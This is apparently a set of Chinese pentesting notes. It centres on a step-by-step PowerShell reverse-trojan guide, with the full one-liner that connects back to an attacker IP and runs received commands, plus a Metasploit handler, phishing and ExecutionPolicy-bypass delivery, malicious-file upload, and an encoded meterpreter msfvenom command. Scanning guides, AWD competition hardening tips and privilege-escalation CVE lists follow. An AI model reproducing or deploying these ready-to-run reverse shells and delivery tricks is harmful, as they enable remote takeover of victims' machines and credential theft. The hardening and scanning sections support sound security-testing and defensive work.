### PowerShell Command 木马

PowerShell 是 Windows 系统内置的命令行脚本环境，因此在渗透测试中，攻击者常利用 PowerShell 脚本来执行恶意操作，而无需上传可执行文件。以下是使用 PowerShell 命令来生成和执行反向木马的一些常见步骤。

#### 1. 生成 PowerShell 反向木马命令

PowerShell 反向木马允许攻击者通过 PowerShell 执行命令来建立一个远程会话，这样可以在目标系统上执行命令、获取信息或者控制目标。

使用 msfvenom 生成 PowerShell 反向木马命令：

msfvenom -p windows/powershell_reverse_tcp LHOST=<攻击者IP> LPORT=<攻击者端口> -f raw

例如：

msfvenom -p windows/powershell_reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f raw

这将生成一个 PowerShell 反向连接的命令，如下所示：

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.100',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII.GetBytes($sendback2));$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

解释：
- `LHOST=192.168.1.100`：攻击者的 IP 地址。
- `LPORT=4444`：监听端口。
- `-f raw`：输出原始的 PowerShell 命令。

这段命令通过创建一个 TCP 客户端，连接到攻击者指定的主机和端口，并通过流将输入的 PowerShell 命令执行，然后将结果返回给攻击者。

#### 2. 启动 Metasploit 监听器

在 Metasploit 中启动 `multi/handler` 模块并监听反向连接：

msfconsole
use exploit/multi/handler
set payload windows/powershell_reverse_tcp
set LHOST 192.168.1.100
set LPORT 4444
run

- `set LHOST 192.168.1.100`：设置攻击者的 IP 地址。
- `set LPORT 4444`：设置监听的端口。
- `run`：启动监听等待目标机器的反向连接。

#### 3. 在目标系统上执行 PowerShell 命令

将上面生成的 PowerShell 反向木马命令传递给目标机器并在目标机器上执行。可以通过以下方式执行：

1. **直接在 PowerShell 中执行**：
在目标机器上打开 PowerShell 窗口并直接粘贴命令进行执行。

   powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.100',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII.GetBytes($sendback2));$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
   

2. **通过社会工程学手段执行**：
通过社会工程学手段诱使目标用户执行该命令。例如，通过邮件、钓鱼网站或者在目标机器上放置一个伪装的 PowerShell 脚本，诱使用户运行。

3. **通过文件执行**：
将 PowerShell 反向木马命令保存为 .ps1 脚本文件，例如 `reverse.ps1`，然后通过以下命令执行：

   powershell -ExecutionPolicy Bypass -File reverse.ps1
   

-ExecutionPolicy Bypass 用于绕过 PowerShell 的执行策略，允许执行脚本。

#### 4. 接收反向连接

当目标机器执行 PowerShell 命令时，Metasploit 控制台将显示以下信息，表示已经成功获得目标的反向连接：

[*] Started reverse TCP handler on 192.168.1.100:4444 
[*] Sending stage (179779 bytes) to 192.168.5.233
[*] Meterpreter session 1 opened (192.168.1.100:4444 -> 192.168.5.233:4444) at 2024-11-09 22:14:57 -0500

此时，你可以通过 Meterpreter 会话进行各种操作，如获取系统信息、执行命令、上传/下载文件等。

#### 5. 后续操作

通过反向连接，你可以执行一系列操作。例如，查看系统信息：

sysinfo

或者上传恶意文件：

upload /path/to/malicious/file C:\Users\Public\malicious.exe

#### 总结

PowerShell 反向木马是一个强大且隐蔽的攻击方式。它无需依赖可执行文件，而是通过 PowerShell 直接在目标机器上执行恶意命令。通过适当的社会工程学技巧或合法的管理工具，可以绕过防火墙和其他安全措施，进行渗透测试和攻击。

### 关键词
#PowerShell #反向木马 #ReverseShell #Metasploit #windows/powershell_reverse_tcp #Meterpreter #渗透测试

### 使用 PowerShell 命令生成反向木马

在渗透测试中，有时会选择使用 PowerShell 作为载体来执行反向连接命令。这种方式不需要生成可执行文件（exe），而是利用 PowerShell 脚本直接从目标机器发起反向连接到攻击者的机器。

Metasploit 提供了一个 PowerShell 反向 shell payload，可以帮助你生成和执行这种反向木马。

#### 步骤 1：生成 PowerShell 反向连接命令

使用 msfvenom 来生成 PowerShell 反向连接命令，避免将恶意文件上传到目标机器，而是通过 PowerShell 直接执行命令。

1. **生成 PowerShell 反向木马命令**：

假设攻击者的 IP 地址是 `192.168.5.100`，端口是 `4444`，执行以下命令生成 PowerShell 反向 shell：

   msfvenom -p windows/powershell_reverse_tcp LHOST=192.168.5.100 LPORT=4444 -f raw
   

- `-p windows/powershell_reverse_tcp`：选择 PowerShell 反向连接 payload。
- `LHOST=192.168.5.100`：设置攻击者的 IP 地址。
- `LPORT=4444`：设置监听的端口。
- `-f raw`：生成原始的 PowerShell 命令。

输出将是类似这样的 PowerShell 命令：

   powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.5.100',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII.GetBytes($sendback2));$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
   

这个命令会启动一个 PowerShell 反向连接并连接到攻击者的机器。

#### 步骤 2：设置 Metasploit 监听器

1. **启动 Metasploit 控制台并设置监听器**：

启动 Metasploit 并使用 `multi/handler` 模块来监听目标机器的反向连接。

   msfconsole
   

2. **设置监听器参数**：

在 Metasploit 控制台中执行以下命令来设置监听器：

   use exploit/multi/handler
   set payload windows/powershell_reverse_tcp
   set LHOST 192.168.5.100
   set LPORT 4444
   run
   

- `use exploit/multi/handler`：选择通用的处理程序。
- `set payload windows/powershell_reverse_tcp`：选择 PowerShell 反向连接 payload。
- `set LHOST 192.168.5.100`：设置攻击者的 IP 地址。
- `set LPORT 4444`：设置监听的端口。

3. **开始监听反向连接**：

执行 `run` 启动监听，等待目标执行 PowerShell 命令并反向连接。

#### 步骤 3：在目标机器上执行 PowerShell 命令

将上面生成的 PowerShell 命令复制到目标机器上并通过 PowerShell 执行。可以使用以下几种方式之一来执行：

1. **直接在 PowerShell 中执行命令**：

通过手动输入或在目标机器的 PowerShell 命令行中执行命令。

2. **通过文件执行**：

可以将该命令写入一个 PowerShell 脚本文件（例如 `reverse.ps1`），然后执行该文件：

   powershell -ExecutionPolicy Bypass -File reverse.ps1
   

3. **通过社会工程学**：

可以通过钓鱼邮件、社交工程等方式诱使目标用户执行该命令。

#### 步骤 4：接收反向连接

一旦目标执行 PowerShell 命令，你将会在 Metasploit 控制台中看到类似以下输出：

[*] Started reverse TCP handler on 192.168.5.100:4444 
[*] Sending stage (179779 bytes) to 192.168.5.233
[*] Meterpreter session 1 opened (192.168.5.100:4444 -> 192.168.5.233:4444) at 2024-11-09 22:14:57 -0500

这意味着你已经成功获取了目标机器的 Meterpreter 会话，可以继续执行各种渗透测试任务。

#### 步骤 5：后续操作

一旦建立反向连接，你可以通过 Meterpreter 执行各种操作，如：

- 获取系统信息
- 上传/下载文件
- 执行系统命令

例如，使用以下命令获取目标机器的系统信息：

sysinfo

### 总结

PowerShell 反向木马是一种不依赖于上传可执行文件的反向连接方式，它通过 PowerShell 脚本直接从目标机器反向连接到攻击者机器。这种方式隐蔽性较高，且容易被利用。

### 关键词
#Metasploit #PowerShell #ReverseShell #反向木马 #Meterpreter #windows/powershell_reverse_tcp

### 使用 Nmap 进行目录扫描（基于字典）

Nmap 本身并不内置专门用于目录扫描的功能，但可以通过 http-enum 脚本与字典结合，进行目录扫描。

### 使用 http-enum 脚本扫描目录

1. **指定字典文件**：
http-enum 脚本支持通过 --script-args 参数传递字典文件来进行目录扫描。字典文件应该是一个包含潜在目录名称的文本文件（例如，`dir-2000.txt`）。

2. **命令格式**：
你可以使用以下命令进行目录扫描：

   nmap -p 80 --script http-enum --script-args http-enum.paths=/path/to/your/dictionary.txt 192.168.5.233
   

- `-p 80`：扫描目标主机的 80 端口。
- --script http-enum`：使用 Nmap 的 `http-enum 脚本。
- `--script-args http-enum.paths=/path/to/your/dictionary.txt`：指定字典文件路径。
- `192.168.5.233`：目标主机的 IP 地址。

### 配置字典文件
你可以使用一些常见的字典文件，比如 `dir-2000.txt`、`common.txt` 或者你自定义的字典文件。

#### 示例：
假设你有一个字典文件 dir-2000.txt`，并且你将其放置在 /home/kali/dir-2000.txt` 路径下，命令如下：

nmap -p 80 --script http-enum --script-args http-enum.paths=/home/kali/dir-2000.txt 192.168.5.233

### 扫描结果
Nmap 会根据字典中的目录列表，扫描每一个可能的目录并尝试访问，如果找到有效的目录，会在结果中显示出来。

### 注意事项
- http-enum 脚本会尝试请求每个目录并根据 HTTP 响应码判断是否存在该目录。例如，响应 200 表示目录存在，而 404 表示目录不存在。
- 扫描时，如果目标站点的目录结构比较复杂，或者存在很多目录，这个扫描可能会比较慢。

### 示例输出
如果扫描成功，输出可能如下所示：

Nmap scan report for 192.168.5.233
Host is up (0.0010s latency).

PORT   STATE SERVICE
80/tcp open  http
| http-enum:
|   /admin/: Found directory
|   /images/: Found directory
|   /uploads/: Found directory
|   /login/: Found directory
|_  /assets/: Found directory

Nmap done: 1 IP address (1 host up) scanned in 8.92 seconds

### 总结
使用 nmap 的 http-enum 脚本配合字典文件，可以高效地扫描目标网站的潜在目录。确保字典文件路径正确，且脚本已根据需求进行配置。

### 关键词
#Nmap #http-enum #目录扫描 #字典扫描 #漏洞扫描

### Nmap 导出 XML，然后在 Metasploit 中导入

Nmap 可以将扫描结果导出为 XML 格式，Metasploit 可以通过 db_import 命令导入这些 Nmap 的扫描结果。这个过程可以帮助您将 Nmap 扫描得到的结果直接存储到 Metasploit 的数据库中，方便后续分析和利用。

### 步骤 1：用 Nmap 执行扫描并导出 XML

首先，使用 Nmap 执行扫描并将结果保存为 XML 文件。您可以使用以下命令执行 Nmap 扫描：

nmap -p 80 --script vuln -T4 -oX nmap_results.xml 192.168.5.233

- -oX nmap_results.xml 选项指定将扫描结果导出为 XML 文件。
- --script vuln 用于运行漏洞扫描脚本。

### 步骤 2：将 Nmap XML 文件导入 Metasploit

完成扫描后，使用 Metasploit 的 db_import 命令导入 Nmap 导出的 XML 文件。首先确保 Metasploit 已连接到数据库，然后执行以下命令：

msf6 > db_import /path/to/nmap_results.xml

- /path/to/nmap_results.xml 替换为您的实际文件路径。
- Metasploit 会解析 Nmap 导出的 XML 文件，并将结果导入数据库，包括主机、服务、漏洞等信息。

### 步骤 3：验证导入的数据

导入完成后，您可以通过 Metasploit 的 hosts`、`services 和 vulns 等命令来查看数据库中的信息：

msf6 > hosts
msf6 > services
msf6 > vulns

### 示例

假设您已经在 192.168.5.233 上运行了 Nmap 扫描并导出了 XML 文件，接下来将其导入 Metasploit 数据库：

1. 执行 Nmap 扫描并导出 XML：

   nmap -p 80 --script vuln -T4 -oX nmap_results.xml 192.168.5.233
   

2. 导入 XML 文件到 Metasploit：

   msf6 > db_import /path/to/nmap_results.xml
   

3. 验证导入数据：

   msf6 > hosts
   msf6 > services
   msf6 > vulns
   

### 注意事项

- 确保 Nmap 执行时使用了合适的脚本来检测漏洞，否则扫描结果可能没有包含您需要的漏洞信息。
- 如果扫描结果太大或复杂，可能需要查看 Metasploit 的日志以确认导入是否成功。
- 确保在运行 db_import 命令时 Metasploit 正在连接到数据库，您可以使用 db_status 检查数据库连接状态。

### 关键词
#Nmap #Metasploit #db_import #XML #漏洞扫描 #导入扫描结果 #数据库

### 在 Metasploit 中对网段进行扫描并存储到工作区

Metasploit 提供了一些强大的功能来进行网络扫描和渗透测试，您可以将扫描结果存储到特定的工作区中，以便后续使用和分析。以下是如何在 Metasploit 中对一个网段进行扫描并将结果存储到特定工作区的步骤。

#### 1. 创建并切换工作区

首先，确保您已创建一个新的工作区，并切换到该工作区。您可以使用 workspace 命令创建和切换工作区。

- 创建一个新的工作区：

  workspace -a my_workspace
  

- 切换到已创建的工作区：

  workspace my_workspace
  

#### 2. 使用 `db_nmap` 扫描网段

Metasploit 提供了 db_nmap 命令，用于对网段进行扫描并将结果自动保存到数据库中（包含工作区）。`db_nmap` 是 nmap 命令的扩展，可以将 Nmap 扫描结果直接导入 Metasploit 数据库。

例如，要对整个网段进行扫描，您可以执行以下命令：

- 执行 Nmap 扫描并将结果存入数据库：

  db_nmap -sP 192.168.1.0/24
  

这个命令会执行一个简单的 Ping 扫描 (-sP)，它会检查 192.168.1.0 到 192.168.1.255 范围内的所有主机是否在线，并将结果存储到当前工作区的数据库中。

- 执行完整的端口扫描并存储结果：

  db_nmap -p 1-65535 192.168.1.0/24
  

这将扫描网段内的所有主机和端口，并将结果保存到数据库。

#### 3. 查看扫描结果

扫描完成后，您可以通过以下命令查看扫描到的主机、服务和漏洞信息：

- 查看扫描到的主机：

  hosts
  

- 查看扫描到的服务：

  services
  

- 查看漏洞信息：

  vulns
  

#### 4. 进一步操作

一旦您完成了扫描并收集了数据，您可以使用 Metasploit 中的其他模块（例如漏洞利用模块、攻击模块等）对扫描到的目标进行进一步渗透测试。

#### 示例命令：

msfconsole
workspace -a my_workspace    # 创建并切换到工作区
db_nmap -sS -p 80,443 192.168.1.0/24  # 执行 SYN 扫描，扫描 HTTP 和 HTTPS 端口
hosts                        # 查看扫描到的主机

### 关键词
#Metasploit #db_nmap #网段扫描 #工作区 #nmap扫描 #渗透测试

### 将攻击结果添加到 Metasploit 数据库中的方法

在 Metasploit 中，数据库用于存储和管理渗透测试过程中收集的数据，如扫描结果、漏洞信息、已利用的主机、有效载荷等。Metasploit 可以与数据库连接，以便更好地组织和跟踪攻击过程。

要将攻击结果添加到数据库，确保数据库已正确配置并与 Metasploit 集成。以下是配置和使用数据库存储攻击结果的基本步骤：

#### 1. 确保数据库已启用

Metasploit 使用 PostgreSQL 作为默认数据库。在启动 Metasploit 之前，确保 PostgreSQL 数据库已经启动并且 Metasploit 已经连接到数据库。

1. 启动 PostgreSQL 数据库：

   service postgresql start
   

2. 启动 Metasploit 并确保数据库连接正常：

   msfconsole
   

3. 在 Metasploit 控制台中检查数据库连接状态：

   db_status
   

如果数据库连接成功，会显示类似如下的输出：

   [*] Connected to the database.
   

如果没有连接到数据库，可以通过以下命令手动配置数据库连接：

   db_connect msf:password@localhost/msf
   

#### 2. 将攻击结果保存到数据库

一旦数据库连接成功，Metasploit 会自动将扫描和攻击的结果保存到数据库中。以下是几种常见情况：

- 扫描结果（例如 Nmap 扫描）**：
使用 `db_nmap` 命令进行扫描，结果会自动添加到数据库中：
```bash
db_nmap -sS 192.168.1.0/24
```

- **漏洞扫描和利用**：
执行漏洞扫描或利用（例如使用 `auxiliary` 模块或 `exploit` 模块）时，攻击的目标、成功与否、已执行的命令等结果会自动存储到数据库中。

- **查看数据库中的数据**：
使用 `hosts` 命令查看已记录的主机信息：
```bash
hosts
```

查看扫描的服务：
```bash
services
```

查看漏洞信息：
```bash
vulns
```

#### 3. **手动添加结果到数据库

在某些情况下，你可能希望手动将某些数据（如手动发现的漏洞）添加到数据库中。这可以通过 db_insert 等命令完成，但大多数情况下，Metasploit 会自动管理这些数据。

#### 4. 导出数据库中的数据

如果需要导出攻击数据进行报告或分析，可以使用 Metasploit 提供的导出功能。例如，使用 db_export 导出数据为 XML 格式：

db_export -f xml /path/to/output.xml

### 关键词
#Metasploit #数据库 #db_status #攻击结果 #db_nmap #渗透测试

### 在 Metasploit 中创建工作区的方法

在 Metasploit 中，工作区（Workspace）用于组织和管理不同的渗透测试项目和相关数据。每个工作区都可以独立存储扫描结果、漏洞信息、已利用的主机等，使得测试过程更加有序。创建和切换工作区是 Metasploit 操作中的常见步骤。

#### 创建工作区的步骤：
1. **启动 Metasploit 控制台**：
在终端中输入以下命令启动 Metasploit：

   msfconsole
   

2. **创建新的工作区**：
使用 workspace 命令来创建一个新的工作区。例如，创建名为 my_workspace 的工作区：

   workspace -a my_workspace
   

其中，`-a` 参数表示“添加”一个新工作区。

3. **查看当前工作区**：
使用以下命令查看当前活动的工作区：

   workspace
   

4. **切换工作区**：
如果你已经创建了多个工作区，可以通过以下命令切换到另一个工作区：

   workspace <workspace_name>
   

5. **列出所有工作区**：
使用以下命令列出所有已创建的工作区：

   workspace -l
   

#### 示例操作：

msfconsole
workspace -a my_test_workspace  # 创建工作区
workspace -l                   # 列出所有工作区
workspace my_test_workspace    # 切换到新创建的工作区

通过创建和管理多个工作区，Metasploit 能有效地将不同的渗透测试任务和数据分开，便于进行独立操作。

### 关键词
#Metasploit #工作区 #workspace #渗透测试 #msfconsole

### 关于 msfvenom 的介绍

msfvenom 是 Metasploit 框架中的一个重要工具，主要用于生成各种类型的有效载荷（payload），并将其编码为不同格式，以便进行渗透测试或漏洞利用。它结合了 msfpayload 和 msfencode 的功能，使得生成并编码 payload 变得更加高效。

通过 msfvenom`，用户可以指定载荷类型、编码方式、目标平台等选项，生成适用于不同攻击场景的有效载荷。它支持多种格式输出，包括但不限于可执行文件、PHP、Python 脚本、Windows 格式等。`msfvenom 可以用于创建反向 Shell、Meterpreter 会话等攻击载荷。

常见的使用示例：

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4444 -f exe > payload.exe

这个命令将生成一个 Windows 平台的 Meterpreter 反向 Shell，有效载荷通过 payload.exe 执行。

### 关键词
#msfvenom #Metasploit #有效载荷 #渗透测试 #反向Shell #Meterpreter

### 关于 msf-nasm_shell 的介绍

msf-nasm_shell 是 Metasploit 框架中的一个工具，专门用于提供一个交互式的汇编语言编辑器。通过该工具，用户可以在 Metasploit 环境下编写和修改汇编代码，主要用于生成有效的 shellcode。它通常与漏洞利用、渗透测试以及攻击载荷生成等活动相关联。

在使用时，用户可以输入汇编指令，并实时查看生成的机器码，以便通过 Metasploit 进一步使用。该工具能够简化 shellcode 的创建过程，尤其是在进行针对性的漏洞测试时。

### 关键词
#msf-nasm_shell #Metasploit #汇编 #shellcode #渗透测试

metasploit framework

查找可利用的提权漏洞
use post/multi/recon/local_exploit_suggester

生成木马
msfvenom -p windows/meterpreter/reverse_tcp LH0ST=192.168.5.229 LP0RT=4444 -e x86/shikata_ga_nai -i 5 -f exe > payload.exe

### 在 Windows 中查看本机端口使用情况

在 Windows 上查看端口使用情况，可以使用多种工具和命令。最常用的是通过 命令提示符 中的 netstat 命令或者 PowerShell**，以及 **资源监视器 来查看端口的使用情况。

### 1. 使用 `netstat` 命令

netstat 是一个非常常用的网络工具，可以查看当前网络连接、端口占用、以及网络统计信息。

#### 查看所有端口和连接状态：

netstat -an

- `-a`：显示所有连接和监听的端口。
- `-n`：以数字形式显示地址和端口（避免进行 DNS 解析）。

#### 查看特定端口的占用情况：
例如，查看 80 端口的占用情况：

netstat -an | findstr :80

#### 查看端口及其对应的进程：
要查看端口和对应的进程信息，可以使用：

netstat -ano

- `-o`：显示与每个连接相关的进程 ID（PID）。

查看特定端口与进程关联：

netstat -ano | findstr :80

#### 根据 PID 查找对应的程序：
通过 `netstat` 获得进程 ID（PID）后，可以在任务管理器中查找对应的进程，或者使用以下命令查看：

tasklist | findstr <PID>

### 2. 使用 PowerShell

PowerShell 提供了比 netstat 更强大的功能，能够轻松查看端口和进程的详细信息。

#### 查看所有监听端口：

Get-NetTCPConnection | Where-Object {$_.State -eq 'Listen'}

这将列出所有处于监听状态的 TCP 连接和端口。

#### 查看特定端口的占用情况：

Get-NetTCPConnection -LocalPort 80

#### 查看进程与端口映射关系：

Get-NetTCPConnection | Select-Object LocalAddress,LocalPort,State,OwningProcess

可以结合进程 ID（OwningProcess）查找具体进程。

### 3. 使用资源监视器（Resource Monitor）

Windows 资源监视器也提供了图形界面来查看端口的使用情况。

#### 步骤：
1. 打开任务管理器：右键任务栏，选择“任务管理器”。
2. 切换到“性能”标签页。
3. 点击“打开资源监视器”。
4. 在“网络”标签页下，点击“监听端口”部分，即可查看当前所有正在监听的端口及其对应的进程。

### 4. 使用 TCPView

[TCPView](https://docs.microsoft.com/en-us/sysinternals/downloads/tcpview) 是 Sysinternals 提供的一款小工具，可以实时显示所有端口的状态，包括每个端口的详细信息，且支持排序、刷新和杀死进程。

#### 使用步骤：
1. 下载并运行 TCPView 工具。
2. 它将列出所有活动的 TCP/UDP 端口，并显示每个端口的进程和状态。

### 总结

在 Windows 上查看端口使用情况，最常见的方式是使用 `netstat`、PowerShell 或资源监视器。根据需求，你可以选择使用命令行工具或图形化工具来查看本机端口的状态，进而了解系统的网络连接和端口占用情况。

#Windows #端口 #netstat #PowerShell #TCPView #资源监视器 #任务管理器 #网络配置

Docs

TCPView for Windows - Sysinternals

Active socket command-line viewer.

nc默认使用tcp协议，使用-u可以设置udp协议。

虚机​kali使用NAT模式时，可以设置tcp/udp端口转发，用宿主机win的ip＋端口反弹shell。

# AWD攻防赛参考思路

## 本次比赛环境
- **Windows+Linux组合模式**：
- Windows Server 2003 + Centos6.x/Ubuntu14/16.04/Ubuntu17.01
- Window7 + Centos6.x/Ubuntu14/16.04/Ubuntu17.01
- Windows Server 2008 + Centos6.x/Ubuntu14/16.04/Ubuntu17.01

## Windows加固
- **先备份**：Web源码、数据库
1. 445端口加固，开启防火墙或IP高级安全策略
2. 开启系统日志审计功能
3. 禁用guest账户、关闭文件共享
4. 确保启动项内容是可控的
5. 限制3389远程访问控制的连接数
在本地组策略编辑器中，依次展开：计算机配置 → 管理模板 → Windows组件 → 远程桌面服务 → 远程桌面会话主机 → 连接 → 限制连接的数量。
6. 使用工具监控关键目录文件：`文件操作监控.exe` / 御剑文件监控.exe
7. 恶意代码文件查找，通过PCHunter, Monitor
8. Web目录环境查找相关可疑文件：jpg/png/rar，属性、解压
9. NTFS扫描磁盘查找隐藏的交换流数据
10. 查找系统所有账户信息，禁止非administrator账户
11. 修改Web站点管理员访问路径、默认口令、数据库口令
12. 安装WAF脚本，防护web站点，禁止其他漏洞

## Linux加固
- **先备份**：Web源码、数据库
1. 系统口令修改，团队统一口令
2. 通过`.bash_history`查找历史命令操作，发现痕迹
3. 查看计划任务：`crontab -l`；编辑计划任务：`crontab -e`
4. 查看`/etc/init.d/rc.local`中启动服务有无异常
5. 使用脚本开启进程监控、目录监控、流量监控
6. Web站点口令、站点管理员路径修改
7. 系统加固：`iptables`
- 进程线程：`netstat / ps -aux/netstat -apt`
- SSH：`w/fuser`
- 杀掉进程：`kill -9 pid`

## Mysql加固
1. 不使用默认口令，修改成复杂的，并确保和web环境连接
2. 设置只允许本地127.0.0.1账户登录
修改`bind-address=127.0.0.1`，在配置文件中加入`secure_file_priv=NULL`
3. 开启日志审计功能：`general_log_file=路径`

## Mssql加固
1. 删除不必要的账号
2. SQLServer用户口令安全
3. 根据用户分配帐号避免帐号共享
4. 分配数据库用户所需的最小权限
5. 网络访问限制
6. SQLServer登录审计
7. SQLServer安全事件审计
8. 配置日志功能

## 攻击准备
1. 各类CMS软件包最新版准备
2. 扫描工具：`nmap`、`nessus`、`metasploit`更新
3. 漏洞利用脚本：`poc`、`exp`

## Kali更新，解决签名问题：

wget -q -O - https://archive.kali.org/archive-key.asc  | apt-key add
uname -a
cat /proc/version

## Windows提权
- ms17-017
- ms17-010

## Linux提权
- CVE-2017-6074 (DCCP双重释放漏洞 > 2.6.18）
- CVE-2016-5195（脏牛，kernel 2.6.22 < 3.9 (x86/x64)）
- CVE-2016-8655（Ubuntu 12.04、14.04，Debian 7、8）
- CVE-2017-1000367（sudo本地提权漏洞）
- CVE-2016-1247（Nginx权限提升漏洞）
- CVE-2017-16995(Ubuntu16.04 kernel:4.14-4.4)

## 中间件服务器
- IIS
- Apache
- JBoss
- MySQL
- Nginx
- Tomcat
- WebLogic

## 集成服务环境
- WAMPServer
- XAMPPServer

## CMS列表参考
- 下载最新版本+每个CMS对应的漏洞poc、exp工具脚本文章，之后汇总：
- Apache
- ASPCMS
- Dedecms
- Dicuz
- Drupal
- EmpireCMS
- Eshop
- FineCMS
- Joomla
- LAMP
- Metainfo
- Nginx
- Phpcms
- Phpwind
- Qibocms
- Seacms
- Semcms
- Tomcat
- Wolfcms
- Wordpress
- Zabbix

## 参考链接
- [FreeBuf](http://freebuf.com/)
- [Huseck GitHub](https://github.com/Huseck)
- [Seebug](https://www.seebug.org/)
- [安全客](https://www.anquanke.com/)
- [Exploit-DB](https://www.exploit-db.com/)
- [Bugscan](http://www.bugscan.net/source/template/vulns/)

#AWD攻防赛 #加固策略 #Windows #Linux #MySQL #MSSQL #提权 #CMS #漏洞扫描 #安全工具

在 Linux 和 Windows 系统中，即使是低权限用户（非管理员用户），也有一些目录可以写入，用于存储个人数据或临时文件。这些目录设计成便于应用程序和用户进行临时存储，不会影响系统安全和稳定性。

Linux 中低权限用户可写入的目录

1. /tmp - 这是 Linux 系统的临时目录，所有用户都有写入权限。目录权限为 1777，即所有用户可以读取、写入和执行，但启用了粘滞位 (sticky bit)，防止用户删除他人文件。


2. /var/tmp - 用于存储长时间存在的临时文件，与 /tmp 类似，普通用户也有写入权限，系统重启时不会清空。


3. 用户主目录（/home/username） - 每个用户在 /home 目录下有一个个人主目录，默认情况下用户对自己的主目录拥有完全的读写权限。可以存储用户的个人文件、设置和下载内容。


4. /dev/shm - 共享内存目录，低权限用户可以写入，用于进程间通信的共享内存文件，但需要注意安全性。



Windows 中低权限用户可写入的目录

1. %TEMP% 或 %TMP% - 系统的临时目录，通常位于 C:\Users\<username>\AppData\Local\Temp，低权限用户有完全的读写权限，用于存储临时文件。


2. 用户主目录（C:\Users<username>） - 每个用户的主目录下包含桌面、文档、下载等文件夹，用户对这些文件夹有完全的读写权限。


3. C:\ProgramData - 虽然主要用于存放共享应用数据，但某些应用的配置文件夹可能允许低权限用户写入，视具体应用设置而定。


4. 应用数据目录（C:\Users<username>\AppData\Local 和 C:\Users<username>\AppData\Roaming） - 应用程序用来存储用户特定的设置和数据，用户对这些目录有完全的读写权限。



总结

在 Linux 中，低权限用户可以写入 /tmp、/var/tmp、/dev/shm 以及个人主目录。

在 Windows 中，低权限用户可以写入 %TEMP%、用户主目录（C:\Users\<username>）以及 AppData 文件夹中的本地和漫游目录。


这些目录被设计成允许用户写入而不影响系统的稳定性或安全性。